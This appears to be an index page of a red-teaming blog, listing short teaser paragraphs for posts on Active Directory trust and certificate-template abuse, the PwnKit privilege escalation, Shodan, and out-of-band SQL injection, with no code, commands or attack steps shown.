Active Directory: Exploiting Trust Relationships I

Active Directory: Exploiting Trust Relationships I

Let’s continue with the posts on Red Teaming.  After the post on how to exploit misconfigured Certificate Templates, today we will talk about the forests, the trust relationships that are established between the different domains, and how to abuse them to pivot and gain access to other domains. Basic Concepts Let me first define some … Read more

Active Directory: Exploiting Certificate Templates

Active Directory: Exploiting Certificate Templates

Today I would like to talk about a vulnerability that I have found frequently in the Red Team exercises I have participated in. It is the exploitation of misconfigured Active Directories Certificate Templates. Context First of all, let’s put a bit of context to the scenario we find ourselves in. We assume that we have … Read more

New Linux Priv Esc – PwnKit (CVE-2021-4034)

New Linux Priv Esc - PwnKit (CVE-2021-4034)

A memory corruption vulnerability (CVE-2021-4034) in PolKit, a component used in all major Linux distributions and in some Unix-like operating systems, has just appeared and can be easily exploited by unprivileged local users to gain full root privileges. This vulnerability is really interesting given how easy it is to exploit. Moreover, it has been exploitable … Read more

Shodan

Hacking

Shodan is a search engine to find specific services such as webcams, SCADA systems, linksys… Its operation is simple but effective: it scans the whole internet and uses the information returned by the device banners to discover the software version, the device model, etc. Shodan is especially useful for the investigation of IoT devices, since … Read more

SQL Injection: OAST techniques

Hacking

Today I bring you a very interesting type of SQL Injection, and that is not very well known. It’s a variation of Blind SQL Injection.if you’re still not very familiar with SQL injections, I recommend you visit this post first. You should also take a look at noSQL injections from non-relational databases.  In Blind SQL … Read more